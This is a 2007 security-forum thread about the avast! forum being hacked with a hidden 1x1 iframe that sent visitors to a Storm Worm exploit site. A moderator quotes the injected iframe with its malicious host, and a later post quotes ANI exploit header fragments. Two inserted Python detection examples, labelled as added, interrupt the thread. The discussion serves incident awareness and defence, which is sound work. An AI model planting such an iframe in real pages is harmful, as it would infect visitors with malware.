Get this folks...
JeremyWW
August 24th, 2007, 05:38 PM
Alwil's credibility just hit the ground floor like an elevator with the wires cut...
Go here and see what NOD32 does: h__p://forum.avast.com/
The_Duality
August 24th, 2007, 05:47 PM
{QUOTE-> Alwil's credibility just hit the ground floor like an elevator with the wires cut...
Go here and see what NOD32 does: h__p://forum.avast.com/ <-QUOTE}
Hmm... surprising, yet common sense says FP.
JeremyWW
August 24th, 2007, 05:49 PM
Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!
flyrfan111
August 24th, 2007, 05:52 PM
F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.
JeremyWW
August 24th, 2007, 05:57 PM
Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!! :)
flyrfan111
August 24th, 2007, 05:58 PM
Run an On Demand Scan and then look at your log.
The_Duality
August 24th, 2007, 06:04 PM
Oooer ???
This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.
JeremyWW
August 24th, 2007, 06:04 PM
{QUOTE-> Run an On Demand Scan and then look at your log. <-QUOTE}
Doing it now...
flyrfan111
August 24th, 2007, 06:09 PM
{QUOTE-> Oooer ???
This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy. <-QUOTE}
I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.
JeremyWW
August 24th, 2007, 06:12 PM
{QUOTE-> Doing it now... <-QUOTE}
In depth scan finished: Clean machine...
flyrfan111
August 24th, 2007, 06:15 PM
{QUOTE-> In depth scan finished: Clean machine... <-QUOTE}
Look at the log, do you have a bunch of "internal errors"?
raven211
August 24th, 2007, 06:18 PM
Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.
The_Duality
August 24th, 2007, 06:20 PM
I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.
JeremyWW
August 24th, 2007, 06:20 PM
{QUOTE-> Look at the log, do you have a bunch of "internal errors"? <-QUOTE}
No. I'm looking for that specific string, yes? Nothing...
OK...just one, but nothing to do with anything...
24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error
LoneWolf
August 24th, 2007, 06:21 PM
Noticed this earlier.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked ???
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this?
flyrfan111
August 24th, 2007, 06:26 PM
{QUOTE-> I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here. <-QUOTE}
Correct, 2.7 works like a charm.
JeremyWW
August 24th, 2007, 06:27 PM
{QUOTE-> Noticed this earlier.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked ???
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this? <-QUOTE}
Yup...
flyrfan111
August 24th, 2007, 06:28 PM
{QUOTE-> No. I'm looking for that specific string, yes? Nothing...
OK...just one, but nothing to do with anything...
24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe ZIP office2003-KB912022-GLB.exe - internal error <-QUOTE}
I have thousands of them. 228 pages in a word document!!
The_Duality
August 24th, 2007, 06:30 PM
Hacking is looking quite likely here :-\
flyrfan111
August 24th, 2007, 06:33 PM
{QUOTE-> Hacking is looking quite likely here :-\ <-QUOTE}
Yup. Sure looks that way (More Likely). Or quite a few different AV's and Link Scanner are giving FPs (Less Likely).
Bubba
August 24th, 2007, 06:42 PM
We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.
<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>
Thanks
Bubba
192868
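The injected tag Bubba quoted above is the classic shape of an iframe injection: a 1x1 frame pointing at a host the page does not otherwise use. As an added example (not code from this thread or from avast!/Alwil), here is a small Python scanner a forum admin could run over saved page source to flag such frames. It assumes only the standard library; the sample HTML is constructed for the example, with the mediacount.net host and path taken from the quoted tag and nothing actually fetched.

```python
"""Flag hidden or off-site iframes in saved HTML (defender-side check).

Added example; not part of the original thread. Uses only the standard library.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Frames this small render as nothing visible to the user.
SUSPICIOUS_DIMS = {"0", "1", "0px", "1px"}
HIDDEN_STYLE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)


class HiddenIframeFinder(HTMLParser):
    """Collect every <iframe> that is tiny, CSS-hidden, or points off-site."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        # Bare attributes (no value) come through as None; normalise to "".
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        width = a.get("width", "").strip().lower()
        height = a.get("height", "").strip().lower()
        if width in SUSPICIOUS_DIMS or height in SUSPICIOUS_DIMS:
            reasons.append("tiny dimensions")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        src = a.get("src", "")
        host = urlparse(src).hostname
        if host and host.lower() != self.page_host:
            reasons.append(f"off-site src host {host}")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def find_hidden_iframes(html, page_host):
    """Return a list of {'src', 'reasons'} dicts for suspicious iframes in html."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one legitimate frame, one injected 1x1 frame of the
# shape quoted in the thread, and one frame hidden purely by CSS.
SAMPLE_HTML = """<html><body>
<h1>Forum</h1>
<iframe src="http://forum.avast.com/embed" width="400" height="300"></iframe>
<iframe src='http://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>
<iframe src="http://forum.avast.com/x" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML, "forum.avast.com"):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

Run over a page dump, the second and third frames are reported; the first, a normally sized frame on the site's own host, is not. The off-site check is what separates an injected advertiser frame from a legitimate embed, so pass the forum's own hostname as `page_host`.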
The_Duality
August 24th, 2007, 06:43 PM
I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*
raven211
August 24th, 2007, 06:59 PM
Hehe.. Just a bit funny though that many others detect it also then. ::)
The_Duality
August 24th, 2007, 07:02 PM
That's what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Haven't seen one in months
Quite exciting to get a real alert for once...
Bubba
August 24th, 2007, 07:15 PM
{QUOTE-> Of course, it may most likely be a real threat. <-QUOTE}
It is a real threat at the moment due to the iframe code and link still available at Avast.
Windows Animated Cursor Stack Overflow Vulnerability (http://www.determina.com/security.research/vulnerabilities/ani-header.html)
portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link
{QUOTE-> RIFFACONanih$$ TSILTSILanih @ 1f8^ <-QUOTE}
We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.
Proceed with caution,
Bubba
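Bubba's quoted bytes ("RIFF", "ACON", "anih", "LIST") are the chunk headers of an animated cursor file, and the vulnerability he links to comes from the cursor loader trusting the declared length of the "anih" chunk, which is supposed to be a fixed 36-byte structure. As an added example (not code from this thread, from avast!/Alwil, or from Determina), here is a Python chunk walker a scanner or mail gateway could use to flag cursor files whose anih chunk declares a different size, carries a second anih, or declares a chunk running past the end of the file. The two sample files are constructed inline for the example; the malformed one merely has a mis-sized second anih chunk and carries no payload.

```python
"""Walk RIFF/ACON (.ani) chunks and flag anih chunks with a bad declared size.

Added example; not part of the original thread. Standard library only.
"""
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): the fixed structure the cursor loader expects


def walk_chunks(data, start, end, depth=0):
    """Yield (chunk_id, declared_size, offset, depth) for chunks in data[start:end].

    Descends into LIST chunks, whose payload is a 4-byte list type followed by
    nested chunks. Chunks are word-aligned, so an odd size is followed by a pad byte.
    """
    pos = start
    while pos + 8 <= end:
        cid = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        yield cid, size, pos, depth
        body = pos + 8
        if cid == b"LIST" and size >= 4:
            inner_end = min(body + size, end)
            yield from walk_chunks(data, body + 4, inner_end, depth + 1)
        pos = body + size + (size & 1)


def inspect_ani(data):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON animated cursor"]
    anih_count = 0
    for cid, size, off, _depth in walk_chunks(data, 12, len(data)):
        if cid == b"anih":
            anih_count += 1
            if size != ANIH_SIZE:
                findings.append(
                    f"anih at offset {off} declares {size} bytes, expected {ANIH_SIZE}")
            if anih_count > 1:
                findings.append(f"extra anih chunk at offset {off} (#{anih_count})")
        if off + 8 + size > len(data):
            findings.append(
                f"chunk {cid!r} at offset {off} declares size {size} past end of file")
    if anih_count == 0:
        findings.append("no anih chunk")
    return findings


# --- constructed sample files (not real cursors from the incident) -----------
def _chunk(cid, payload):
    pad = b"\0" if len(payload) & 1 else b""
    return cid + struct.pack("<I", len(payload)) + payload + pad


def _riff(body):
    return b"RIFF" + struct.pack("<I", len(body) + 4) + b"ACON" + body


# Benign: one correctly sized anih (cbSize field = 36) and one frame list.
GOOD_ANI = _riff(
    _chunk(b"anih", b"\x24\x00\x00\x00" + b"\0" * 32)
    + _chunk(b"LIST", b"fram" + _chunk(b"icon", b"\0" * 16)))

# Malformed: a valid anih first, then a second anih declaring 48 bytes.
BAD_ANI = _riff(
    _chunk(b"anih", b"\x24\x00\x00\x00" + b"\0" * 32)
    + _chunk(b"anih", b"\0" * 48))

if __name__ == "__main__":
    for name, sample in (("good", GOOD_ANI), ("bad", BAD_ANI)):
        print(name, inspect_ani(sample) or "clean")
```

The check is deliberately structural: it does not need a signature for any particular payload, only the knowledge that a well-formed cursor has exactly one anih chunk of exactly 36 bytes, which is why the same heuristic catches variants that rename or repack the rest of the file.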
JeremyWW
August 24th, 2007, 07:34 PM
{QUOTE->
Quite exciting to get a real alert for once... <-QUOTE}
Glad to oblige... ;D
The_Duality
August 24th, 2007, 07:54 PM
{QUOTE-> Glad to oblige... ;D <-QUOTE}
Lol ;) it is much appreciated :P
I'm quite interested to see if there is any more news on it. Call it morbid, but I want to know what effect this malware has had.
JeremyWW
August 24th, 2007, 07:59 PM
{QUOTE-> Lol ;) it is much appreciated :P
I'm quite interested to see if there is any more news on it. Call it morbid, but I want to know what effect this malware has had. <-QUOTE}
I would guess that most of the 'effect' was to knock Alwil's credibility. It had the desired effect on me anyway - brought me back here! And I'm happy with what I find...NOD32 AV Beta is running sweetly so far...
The_Duality
August 24th, 2007, 08:05 PM
{QUOTE-> I would guess that most of the 'effect' was to knock Alwil's credibility. It had the desired effect on me anyway - brought me back here! And I'm happy with what I find...NOD32 AV Beta is running sweetly so far... <-QUOTE}
I find that you just cannot beat NOD... for me anyway. It is always a matter of opinion. I would love to install the beta, but I'm waiting for the internal error problem to be sorted.
Sorry for the off topic mods!
Anyway, back on topic, it's doing the job for me, because it is still there! Surely it should be fixed by now! Just take the forums offline for a bit!
flyrfan111
August 24th, 2007, 09:51 PM
It is still infected.
Tarq57
August 25th, 2007, 02:18 AM
Now getting a "404 Not Found" error when attempting to visit. Firefox and IE7.
marc57
August 25th, 2007, 02:18 AM
Norton is also showing it as infected.
Tarq57
August 25th, 2007, 02:20 AM
And now (linking from the Avast home page) "Down for Maintenance."
innerpeace
August 25th, 2007, 03:23 AM
Interesting, but I don't see it as hurting their credibility. Maybe their pride, but Avast did detect it right? Even banks and Government sites get hacked. Anyways, it's good to see it reported and it's getting fixed.
JeremyWW
August 25th, 2007, 03:55 AM
{QUOTE-> Interesting, but I don't see it as hurting their credibility. Maybe their pride, but Avast did detect it right? Even banks and Government sites get hacked. Anyways, it's good to see it reported and it's getting fixed. <-QUOTE}
True...and yes, it did...
innerpeace
August 25th, 2007, 04:11 AM
Thanks JeremyWW, It's good to see Avast caught it. I wish I saw this post earlier so I could try my setup in shadow mode. It's not often one gets to see malware without looking for it. Good find :)
The_Duality
August 25th, 2007, 05:23 AM
{QUOTE-> Thanks JeremyWW, It's good to see Avast caught it. I wish I saw this post earlier so I could try my setup in shadow mode. It's not often one gets to see malware without looking for it. Good find :) <-QUOTE}
Yep, cheers Jeremy :thumb:
As has been said, at least now it is being fixed. And maybe they will consider measures to prevent it happening again.
nadirah
August 25th, 2007, 05:36 AM
{QUOTE-> We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.
<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>
Thanks
Bubba
192868 <-QUOTE}
Here's a screen capture of mediacount.net:
JeremyWW
August 25th, 2007, 07:03 AM
I just had an e-mail from Alwil. It's anonymous - obviously - but states what's happening:
"We found that software used to run forum on our pages is vulnerable and have to be changed/updated (but there is probably no update available for this code injections exploit). We have to find the best solution to this problem. The forum will be off until the solution will be found."
mauserme
August 25th, 2007, 09:52 AM
JeremyWW - I am a fairly regular poster on the avast! forum and have not received that email. Given that it was sent anonymously I would question its source.
JeremyWW
August 25th, 2007, 10:26 AM
{QUOTE-> JeremyWW - I am a fairly regular poster on the avast! forum and have not received that email. Given that it was sent anonymously I would question its source. <-QUOTE}
Sorry, my post was confusing - I meant I was quoting it here anonymously. I know precisely who it's from. I was the first one to notify them directly by e-mail last night which is why I've had the dialogue with them. I suggest you e-mail them at 'virus at avast dot com', and ask for an explanation, as I did.
ThunderZ
August 25th, 2007, 10:46 AM
It is down for maintenance now. ::)
mauserme
August 25th, 2007, 11:07 AM
{QUOTE-> Sorry, my post was confusing - I meant I was quoting it here anonymously. I know precisely who it's from. I was the first one to notify them directly by e-mail last night which is why I've had the dialogue with them. I suggest you e-mail them at 'virus at avast dot com', and ask for an explanation, as I did. <-QUOTE}
My mistake ... :)
I emailed one of the developers last evening (without asking for a response) so at least you and I are trying to accomplish the same thing. It's interesting that this attack started at the beginning of the weekend when staff would be low. But I'm sure they'll get it sorted.
aigle
August 25th, 2007, 11:08 AM
Visited the link with IE7, Opera and FF.
hxxp://mediacount. net /strong/ 020sdsfg/
I get it with all.
GmG
August 25th, 2007, 12:29 PM
mediacount is Storm Worm (WORM/Zhelatin / Nuwar) site.
lucas1985
August 25th, 2007, 02:43 PM
aigle,
Have you tried visiting the site with IE GeSWall'ed (to track the flow of events)?
aigle
August 25th, 2007, 02:59 PM
Nothing was executed on my system.
I stopped on this message. GW log is attached.
lucas1985
August 25th, 2007, 03:14 PM
That page is trying to install/run a MDAC component? Interesting.
LUSHER
August 25th, 2007, 03:29 PM
This is really scary.... I hope I wasn't infected.
DavidR
August 25th, 2007, 06:46 PM
Whilst it might be an embarrassment to have the forum software hacked through a vulnerability, at no time were avast users vulnerable to the attack. As has been said avast detected the infection.
Whilst Firefox and Opera weren't vulnerable to the attack, those with IE or an IE clone would have had the Web Shield block the attempt to infect.
I too got an email from one of the Alwil team as I too reported it to avast, so it would appear that only those who contacted avast like JeremyWW got an email.
JeremyWW
August 25th, 2007, 07:47 PM
{QUOTE-> Whilst it might be an embarrassment to have the forum software hacked through a vulnerability, at no time were avast users vulnerable to the attack. As has been said avast detected the infection.
Whilst Firefox and Opera weren't vulnerable to the attack, those with IE or an IE clone would have had the Web Shield block the attempt to infect.
I too got an email from one of the Alwil team as I too reported it to avast, so it would appear that only those who contacted avast like JeremyWW got an email. <-QUOTE}
And where will the next vulnerability be David? If they can hack the forum, what else can they hack...? I am not 'attacking' Alwil here - I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast!
In my view they should now send a 'mass mail shot' to every Forum user with a brief but understandable explanation.
Jeremy
Tarq57
August 25th, 2007, 08:18 PM
{QUOTE->
Whilst Firefox and Opera weren't vulnerable to the attack, those with IE or an IE clone would have had the Web Shield block the attempt to infect. <-QUOTE}
This was my experience when attempting to visit the forum using IE; the Avast webshield blocked it.
{QUOTE-> I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast! <-QUOTE}
Personally my confidence in Avast is unchanged. So the forum had a vulnerability, OK, not the best, but look at (a) how quickly it was fixed, and (b) the somewhat ironic fact of the associated AV being able to block it.
Remember when Castlecops was down not so long ago following a large DOS attack. Hardly a security company, but really at least as serious a contender in the anti-malware brigade as any AV vendor, I would think.
I do agree the avast team should send a mass email to the forum users.
bob3160
August 25th, 2007, 08:49 PM
It wasn't avast! or Alwil that had a vulnerability.
It was the forum software that had a problem.
It was avast! that stopped the vulnerability from infecting the members system.
The only thing they need to do is post an explanation on either their website or the forum itself. IMHO :)
LoneWolf
August 25th, 2007, 09:12 PM
{QUOTE-> It wasn't avast! or Alwil that had a vulnerability.
It was the forum software that had a problem.
It was avast! that stopped the vulnerability from infecting the members system.
The only thing they need to do is post an explanation on either their website or the forum itself. IMHO :) <-QUOTE}
I agree.
DavidR
August 25th, 2007, 09:20 PM
{QUOTE-> And where will the next vulnerability be David? If they can hack the forum, what else can they hack...? I am not 'attacking' Alwil here - I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast!
In my view they should now send a 'mass mail shot' to every Forum user with a brief but understandable explanation.
Jeremy <-QUOTE}
Well I don't speculate on what the next vulnerability might be in the Simple Machines forum software, considering this is the first occasion this has happened in the three and a half years I have been on the forums. Even though the iframe injection was there in the PHP forum software, avast did after all detect it with the web shield so it was intercepted before it got on to any users system.
I'm not in favour of mass mailings, you would have to send an email to 34,684 members, the current number and not all of those will be active and those that are will probably be aware of it.
So I too feel a notification in the forums would suffice.
LoneWolf
August 25th, 2007, 09:36 PM
site's back up. ;D
Tarq57
August 26th, 2007, 12:34 AM
{QUOTE-> So I too feel a notification in the forums would suffice. <-QUOTE}
OK, Agree. Mass email would be a bit ott I guess.
MrFlibble
August 26th, 2007, 02:20 AM
{QUOTE-> Whilst it might be an embarrassment to have the forum software hacked through a vulnerability, at no time were avast users vulnerable to the attack. As has been said avast detected the infection. <-QUOTE}
avast! detected the exploit served up to IE users, but not that fed to Firefox users.
~Virustotal results removed per forum policy....Bubba~
Aigle, who reported the shellcode.gen malware on the site previously, was using AntiVir, one of few AV's to detect this. The exploit doesn't seem to affect current versions of Firefox, so up-to-date users will not have been infected, but may find the malware in their Firefox cache in later scans (for example with AVG Anti-Spyware) or their own AV if and when the malware is added.
MrFlibble
August 26th, 2007, 06:03 PM
Ok, 'scuse my ignorance, but where exactly can I find this rule that I can't post Virus Total results??
ronjor
August 26th, 2007, 06:09 PM
http://www.wilderssecurity.com/showthread.php?t=180057
{QUOTE-> Threads like that, showing a screen shot or results of a specific detection made by one or more anti-virus products, and show others missing the sample are not of any real value. Files can be found that any AV will get a hit on and others will miss. We could post threads like that, with or without Jotti or VirusTotal results included, all day long and still be none the wiser for it. <-QUOTE}
MrFlibble
August 27th, 2007, 03:32 AM
Thank you.
I would suggest that it would be a common courtesy to new users to point out such rulings when imposing them.
In this particular case, I think to apply that rule was silly, because I was not trying to point score about which AV is better or worse than another, but to inform other forum members about the nature of the malware infecting the avast! website for a short period, to raise the issue of whether Firefox users might have been at risk from malware specifically served up to Firefox users and to let forum members know that they might detect malware in their browser cache with subsequent scans by other products, and indeed might be at risk of having been infected if they were using an out-of-date and vulnerable browser.
What was the nature of the Trojan? Which browsers was it targeted at? What exploits did it use? Which other commonly used anti-malware programs might detect this malware?
These are questions that without the Virus Total information cannot be answered, so anybody interested will just have to trundle over to the avast! forum where the same results are still available.
vlk
August 27th, 2007, 04:13 AM
{QUOTE-> avast! detected the exploit served up to IE users, but not that fed to Firefox users. <-QUOTE}
Just for your information, the Firefox script that was present on the hacked forum was just a downloader of a malicious executable. That executable was being detected by avast, though - so the situation was quite similar to the IE case (no danger).
Fortunately.
Thanks,
Vlk
ccsito
August 27th, 2007, 06:30 PM
The moral of this tale is: don't go to forums or you will catch a communicable virus. ;D ;) ::)
19monty64
August 27th, 2007, 10:25 PM
{QUOTE-> The moral of this tale is: don't go to forums or you will catch a communicable virus. ;D ;) ::) <-QUOTE}
;D ;D ;D roflol....good one!!!
Straight Shooter
August 28th, 2007, 07:09 AM
{QUOTE-> And where will the next vulnerability be David? If they can hack the forum, what else can they hack...? I am not 'attacking' Alwil here - I've not yet heard of this happening to a 'Security Company' - my confidence is down. I am not currently running Avast!
In my view they should now send a 'mass mail shot' to every Forum user with a brief but understandable explanation.
Jeremy <-QUOTE}
I distinctly remember something about Kaspersky being hacked once...